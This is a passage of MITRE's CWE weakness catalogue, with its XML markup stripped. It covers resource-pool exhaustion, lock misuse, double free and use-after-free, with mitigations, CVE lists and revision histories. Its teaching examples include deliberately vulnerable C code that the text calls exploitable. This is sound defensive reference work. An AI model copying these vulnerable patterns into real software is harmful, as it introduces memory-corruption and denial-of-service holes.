+ + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes, Potential_Mitigations, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Equivalence + Failure to Resolve Path Equivalence + + + + The product's resource pool is not large enough to handle peak demand, which allows an attacker to prevent others from accessing the resource by using a (relatively) large number of requests for resources. + Frequently the consequence is a "flood" of connection or sessions. + + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Availability + Integrity + Other + DoS: Crash, Exit, or Restart + Other + Floods often cause a crash or other problem besides denial of the resource itself; these are likely examples of *other* vulnerabilities, not an insufficient resource pool. + + + + + Architecture and Design + Do not perform resource-intensive transactions for unauthenticated users and/or invalid requests. + + + Architecture and Design + Consider implementing a velocity check mechanism which would detect abusive behavior. + + + Operation + Consider load balancing as an option to handle heavy loads. + + + Implementation + Make sure that resource handles are properly closed when no longer needed. + + + Architecture and Design + Identify the system's resource intensive operations and consider protecting them from abuse (e.g. malicious automated script which runs the resources out). + + + + + In the following snippet from a Tomcat configuration file, a JDBC connection pool is defined with a maximum of 5 simultaneous connections (with a 60 second timeout). In this case, it may be trivial for an attacker to instigate a denial of service (DoS) by using up all of the available connections in the pool. + + <Resource name="jdbc/exampledb"auth="Container"type="javax.sql.DataSource"removeAbandoned="true"removeAbandonedTimeout="30"maxActive="5"maxIdle="5"maxWait="60000"username="testuser"password="testpass"driverClassName="com.mysql.jdbc.Driver"url="jdbc:mysql://localhost/exampledb"/> + + + + + + CVE-1999-1363 + Large number of locks on file exhausts the pool and causes crash. + https://www.cve.org/CVERecord?id=CVE-1999-1363 + + + CVE-2001-1340 + Product supports only one connection and does not disconnect a user who does not provide credentials. + https://www.cve.org/CVERecord?id=CVE-2001-1340 + + + CVE-2002-0406 + Large number of connections without providing credentials allows connection exhaustion. + https://www.cve.org/CVERecord?id=CVE-2002-0406 + + + + + Insufficient Resource Pool + + + A9 + Denial of Service + CWE More Specific + + + TPS00-J + Use thread pools to enable graceful degradation of service during traffic bursts + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Functional_Areas, References + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control. + This prevents the product from acting on associated resources or performing other behaviors that are controlled by the presence of the lock. Relevant locks might include an exclusive lock or mutex, or modifying a shared resource that is treated as a lock. If the lock can be held for an indefinite period of time, then the denial of service could be permanent. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Resource Consumption (Other) + When an attacker can control a lock, the program may wait indefinitely until the attacker releases the lock, causing a denial of service to other users of the program. This is especially problematic if there is a blocking operation on the lock. + + + + + White Box + Automated code analysis techniques might not be able to reliably detect this weakness, since the application's behavior and general security model dictate which resource locks are critical. Interpretation of the weakness might require knowledge of the environment, e.g. if the existence of a file is used as a lock, but the file is created in a world-writable directory. + + + + + Architecture and Design + Implementation + Use any access control that is offered by the functionality that is offering the lock. + + + Architecture and Design + Implementation + Use unpredictable names or identifiers for the locks. This might not always be possible or feasible. + + + Architecture and Design + Consider modifying your code to use non-blocking synchronization methods. + + + + + This code tries to obtain a lock for a file, then writes to it. + + function writeToLog($message){$logfile = fopen("logFile.log", "a"); + //attempt to get logfile lock + if (flock($logfile, LOCK_EX)) {fwrite($logfile,$message); + // unlock logfile + flock($logfile, LOCK_UN);}else {print "Could not obtain lock on logFile.log, message not recorded\n";}}fclose($logFile); + + PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock(). + + + + + CVE-2001-0682 + Program can not execute when attacker obtains a mutex. + https://www.cve.org/CVERecord?id=CVE-2001-0682 + + + CVE-2002-1914 + Program can not execute when attacker obtains a lock on a critical output file. + https://www.cve.org/CVERecord?id=CVE-2002-1914 + + + CVE-2002-1915 + Program can not execute when attacker obtains a lock on a critical output file. + https://www.cve.org/CVERecord?id=CVE-2002-1915 + + + CVE-2002-0051 + Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition. + https://www.cve.org/CVERecord?id=CVE-2002-0051 + + + CVE-2000-0338 + Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness. + https://www.cve.org/CVERecord?id=CVE-2000-0338 + + + CVE-2000-1198 + Chain: Lock files with predictable names. Resultant from randomness. + https://www.cve.org/CVERecord?id=CVE-2000-1198 + + + CVE-2002-1869 + Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close. + https://www.cve.org/CVERecord?id=CVE-2002-1869 + + + + + Unrestricted Critical Resource Lock + + + Deadlock + + + A9 + Denial of Service + CWE More Specific + + + LCK00-J + Use private final lock objects to synchronize classes that may interact with untrusted code + + + LCK07-J + Avoid deadlock by requesting and releasing locks in the same order + + + SFP22 + Unrestricted lock + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This overlaps Insufficient Resource Pool when the "pool" is of size 1. It can also be resultant from race conditions, although the timing window could be quite large in some cases. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Detection_Factors, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + KDM Analytics + 2009-07-17 + Critical + Suggested a better name and the minimal relationship with resources regardless of their criticality. + + + KDM Analytics + 2009-07-17 + Added a White_Box_Definition and clarified the consequences. + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Description, Name, Potential_Mitigations, White_Box_Definitions + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + KDM Analytics + 2008-08-29 + suggested clarification of description and observed examples, which were vague and inconsistent. + + Unrestricted Critical Resource Lock + Unrestricted Lock on Critical Resource + + + + The product does not lock or does not correctly lock a resource when the product must have exclusive access to the resource. + When a resource is not properly locked, an attacker could modify the resource while it is being operated on by the product. This might violate the product's assumption that the resource will not change, potentially leading to unexpected behaviors. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Availability + Modify Application Data + DoS: Instability + DoS: Crash, Exit, or Restart + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use a non-conflicting privilege scheme. + + + Architecture and Design + Implementation + Use synchronization when locking a resource. + + + + + The following function attempts to acquire a lock in order to perform operations on a shared resource. + + void f(pthread_mutex_t *mutex) { + pthread_mutex_lock(mutex); + + /* access shared resource */ + + + pthread_mutex_unlock(mutex); + } + + However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. + In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. + + int f(pthread_mutex_t *mutex) { + int result; + result = pthread_mutex_lock(mutex);if (0 != result)return result; + + + /* access shared resource */ + + + return pthread_mutex_unlock(mutex); + } + + + + This Java example shows a simple BankAccount class with deposit and withdraw methods. + + public class BankAccount { + + + // variable for bank account balance + private double accountBalance; + + // constructor for BankAccount + public BankAccount() {accountBalance = 0;} + + // method to deposit amount into BankAccount + public void deposit(double depositAmount) { + + double newBalance = accountBalance + depositAmount;accountBalance = newBalance; + } + + // method to withdraw amount from BankAccount + public void withdraw(double withdrawAmount) { + + double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance; + } + + // other methods for accessing the BankAccount object + ... + } + + However, the deposit and withdraw methods have shared access to the account balance private class variable. This can result in a race condition if multiple threads attempt to call the deposit and withdraw methods simultaneously where the account balance is modified by one thread before another thread has completed modifying the account balance. For example, if a thread attempts to withdraw funds using the withdraw method before another thread that is depositing funds using the deposit method completes the deposit then there may not be sufficient funds for the withdraw transaction. + To prevent multiple threads from having simultaneous access to the account balance variable the deposit and withdraw methods should be synchronized using the synchronized modifier. + + public class BankAccount { + ... + // synchronized method to deposit amount into BankAccount + public synchronized void deposit(double depositAmount) {...} + + // synchronized method to withdraw amount from BankAccount + public synchronized void withdraw(double withdrawAmount) {...} + ... + } + + An alternative solution is to use a lock object to ensure exclusive access to the bank account balance variable. As shown below, the deposit and withdraw methods use the lock object to set a lock to block access to the BankAccount object from other threads until the method has completed updating the bank account balance variable. + + public class BankAccount { + ... + // lock object for thread access to methods + private ReentrantLock balanceChangeLock; + + // condition object to temporarily release lock to other threads + private Condition sufficientFundsCondition; + + // method to deposit amount into BankAccount + public void deposit(double amount) { + + + // set lock to block access to BankAccount from other threads + balanceChangeLock.lock();try { + double newBalance = balance + amount;balance = newBalance; + + // inform other threads that funds are available + sufficientFundsCondition.signalAll(); + + } catch (Exception e) {...}finally {// unlock lock objectbalanceChangeLock.unlock();} + } + + // method to withdraw amount from bank account + public void withdraw(double amount) { + + + // set lock to block access to BankAccount from other threads + balanceChangeLock.lock();try { + while (balance < amount) { + + + // temporarily unblock access + + + // until sufficient funds are available + sufficientFundsCondition.await(); + }double newBalance = balance - amount;balance = newBalance; + + } catch (Exception e) {...}finally {// unlock lock objectbalanceChangeLock.unlock();} + }... + } + + + + + + Insufficient Resource Locking + + + VNA00-J + Ensure visibility when accessing shared primitive variables + + + VNA02-J + Ensure that compound operations on shared variables are atomic + + + LCK00-J + Use private final lock objects to synchronize classes that may interact with untrusted code + + + SFP19 + Missing Lock + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Martin Sebor + Cisco Systems, Inc. + 2010-04-30 + Provided Demonstrative Example + + Insufficient Resource Locking + + + + A product does not check to see if a lock is present before performing sensitive operations on a resource. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Availability + Modify Application Data + DoS: Instability + DoS: Crash, Exit, or Restart + + + + + Architecture and Design + Implementation + Implement a reliable lock mechanism. + + + + + CVE-2004-1056 + Product does not properly check if a lock is present, allowing other attackers to access functionality. + https://www.cve.org/CVERecord?id=CVE-2004-1056 + + + + + Missing Lock Check + + + SFP19 + Missing Lock + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations. + When a program calls free() twice with the same argument, the program's memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack. + + + + + + + + + + + + + + + + + Double-free + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Modify Memory + Execute Unauthorized Code or Commands + Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Choose a language that provides automatic memory management. + + + Implementation + Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once. + + + Implementation + Use a static analysis tool to find double free instances. + + + + + The following code shows a simple example of a double free vulnerability. + + char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); + + Double free vulnerabilities have two common (and sometimes overlapping) causes: + + + + Error conditions and other exceptional circumstances + + + Confusion over which part of the program is responsible for freeing the memory + + + + Although some double free vulnerabilities are not much more complicated than this example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. + + + While contrived, this code should be exploitable on Linux distributions that do not ship with heap-chunk check summing turned on. + + #include <stdio.h>#include <unistd.h>#define BUFSIZE1 512#define BUFSIZE2 ((BUFSIZE1/2) - 8) + int main(int argc, char **argv) {char *buf1R1;char *buf2R1;char *buf1R2;buf1R1 = (char *) malloc(BUFSIZE2);buf2R1 = (char *) malloc(BUFSIZE2);free(buf1R1);free(buf2R1);buf1R2 = (char *) malloc(BUFSIZE1);strncpy(buf1R2, argv[1], BUFSIZE1-1);free(buf2R1);free(buf1R2);} + + + + + + CVE-2006-5051 + Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition (CWE-362) that leads to a double free (CWE-415). + https://www.cve.org/CVERecord?id=CVE-2006-5051 + + + CVE-2004-0642 + Double free resultant from certain error conditions. + https://www.cve.org/CVERecord?id=CVE-2004-0642 + + + CVE-2004-0772 + Double free resultant from certain error conditions. + https://www.cve.org/CVERecord?id=CVE-2004-0772 + + + CVE-2005-1689 + Double free resultant from certain error conditions. + https://www.cve.org/CVERecord?id=CVE-2005-1689 + + + CVE-2003-0545 + Double free from invalid ASN.1 encoding. + https://www.cve.org/CVERecord?id=CVE-2003-0545 + + + CVE-2003-1048 + Double free from malformed GIF. + https://www.cve.org/CVERecord?id=CVE-2003-1048 + + + CVE-2005-0891 + Double free from malformed GIF. + https://www.cve.org/CVERecord?id=CVE-2005-0891 + + + CVE-2002-0059 + Double free from malformed compressed data. + https://www.cve.org/CVERecord?id=CVE-2002-0059 + + + + Memory + + + + DFREE - Double-Free Vulnerability + + + Double Free + + + Doubly freeing memory + + + MEM00-C + Allocate and free memory in the same module, at the same level of abstraction + + + MEM01-C + Store a new value in pointers immediately after free() + + + MEM30-C + Do not access freed memory + CWE More Specific + + + MEM31-C + Free dynamically allocated memory exactly once + + + SFP12 + Faulty Memory Release + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows. + It could be argued that Double Free would be most appropriately located as a child of "Use after Free", but "Use" and "Release" are considered to be distinct operations within vulnerability theory, therefore this is more accurately "Release of a Resource after Expiration or Release", which doesn't exist yet. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. + + The use of previously-freed memory can have any number of adverse consequences, ranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw. The simplest way data corruption may occur involves the system's reuse of the freed memory. Use-after-free errors have two common and sometimes overlapping causes: + + Error conditions and other exceptional circumstances. + Confusion over which part of the program is responsible for freeing the memory. + + In this scenario, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process. + If the newly allocated data happens to hold a class, in C++ for example, various function pointers may be scattered within the heap data. If one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved. + + + + + + + + + + + + + + + + Dangling pointer + + + Use-After-Free + + + + + Implementation + + + High + + + Integrity + Modify Memory + The use of previously freed memory may corrupt valid data, if the memory area in question has been allocated and used properly elsewhere. + + + Availability + DoS: Crash, Exit, or Restart + If chunk consolidation occurs after the use of previously freed data, the process may crash when invalid data is used as chunk information. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If malicious data is entered before chunk consolidation can take place, it may be possible to take advantage of a write-what-where primitive to execute arbitrary code. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Choose a language that provides automatic memory management. + + + Implementation + When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy. + + + + + The following example demonstrates the weakness. + + #include <stdio.h>#include <unistd.h>#define BUFSIZER1 512#define BUFSIZER2 ((BUFSIZER1/2) - 8)int main(int argc, char **argv) {char *buf1R1;char *buf2R1;char *buf2R2;char *buf3R2;buf1R1 = (char *) malloc(BUFSIZER1);buf2R1 = (char *) malloc(BUFSIZER1);free(buf2R1);buf2R2 = (char *) malloc(BUFSIZER2);buf3R2 = (char *) malloc(BUFSIZER2);strncpy(buf2R1, argv[1], BUFSIZER1-1);free(buf1R1);free(buf2R2);free(buf3R2);} + + + + The following code illustrates a use after free error: + + char* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);} + + When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function. + + + + + CVE-2021-0920 + Chain: mobile platform race condition (CWE-362) leading to use-after-free (CWE-416), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-0920 + + + CVE-2020-6819 + Chain: race condition (CWE-362) leads to use-after-free (CWE-416), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-6819 + + + CVE-2010-4168 + Use-after-free triggered by closing a connection while data is still being transmitted. + https://www.cve.org/CVERecord?id=CVE-2010-4168 + + + CVE-2010-2941 + Improper allocation for invalid data leads to use-after-free. + https://www.cve.org/CVERecord?id=CVE-2010-2941 + + + CVE-2010-2547 + certificate with a large number of Subject Alternate Names not properly handled in realloc, leading to use-after-free + https://www.cve.org/CVERecord?id=CVE-2010-2547 + + + CVE-2010-1772 + Timers are not disabled when a related object is deleted + https://www.cve.org/CVERecord?id=CVE-2010-1772 + + + CVE-2010-1437 + Access to a "dead" object that is being cleaned up + https://www.cve.org/CVERecord?id=CVE-2010-1437 + + + CVE-2010-1208 + object is deleted even with a non-zero reference count, and later accessed + https://www.cve.org/CVERecord?id=CVE-2010-1208 + + + CVE-2010-0629 + use-after-free involving request containing an invalid version number + https://www.cve.org/CVERecord?id=CVE-2010-0629 + + + CVE-2010-0378 + unload of an object that is currently being accessed by other functionality + https://www.cve.org/CVERecord?id=CVE-2010-0378 + + + CVE-2010-0302 + incorrectly tracking a reference count leads to use-after-free + https://www.cve.org/CVERecord?id=CVE-2010-0302 + + + CVE-2010-0249 + use-after-free related to use of uninitialized memory + https://www.cve.org/CVERecord?id=CVE-2010-0249 + + + CVE-2010-0050 + HTML document with incorrectly-nested tags + https://www.cve.org/CVERecord?id=CVE-2010-0050 + + + CVE-2009-3658 + Use after free in ActiveX object by providing a malformed argument to a method + https://www.cve.org/CVERecord?id=CVE-2009-3658 + + + CVE-2009-3616 + use-after-free by disconnecting during data transfer, or a message containing incorrect data types + https://www.cve.org/CVERecord?id=CVE-2009-3616 + + + CVE-2009-3553 + disconnect during a large data transfer causes incorrect reference count, leading to use-after-free + https://www.cve.org/CVERecord?id=CVE-2009-3553 + + + CVE-2009-2416 + use-after-free found by fuzzing + https://www.cve.org/CVERecord?id=CVE-2009-2416 + + + CVE-2009-1837 + Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416) + https://www.cve.org/CVERecord?id=CVE-2009-1837 + + + CVE-2009-0749 + realloc generates new buffer and pointer, but previous pointer is still retained, leading to use after free + https://www.cve.org/CVERecord?id=CVE-2009-0749 + + + CVE-2010-3328 + Use-after-free in web browser, probably resultant from not initializing memory. + https://www.cve.org/CVERecord?id=CVE-2010-3328 + + + CVE-2008-5038 + use-after-free when one thread accessed memory that was freed by another thread + https://www.cve.org/CVERecord?id=CVE-2008-5038 + + + CVE-2008-0077 + assignment of malformed values to certain properties triggers use after free + https://www.cve.org/CVERecord?id=CVE-2008-0077 + + + CVE-2006-4434 + mail server does not properly handle a long header. + https://www.cve.org/CVERecord?id=CVE-2006-4434 + + + CVE-2010-2753 + chain: integer overflow leads to use-after-free + https://www.cve.org/CVERecord?id=CVE-2010-2753 + + + CVE-2006-4997 + freed pointer dereference + https://www.cve.org/CVERecord?id=CVE-2006-4997 + + + + Memory + + + + Use After Free + + + Using freed memory + + + MEM00-C + Allocate and free memory in the same module, at the same level of abstraction + + + MEM01-C + Store a new value in pointers immediately after free() + + + MEM30-C + Do not access freed memory + Exact + + + SFP15 + Faulty Resource Use + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 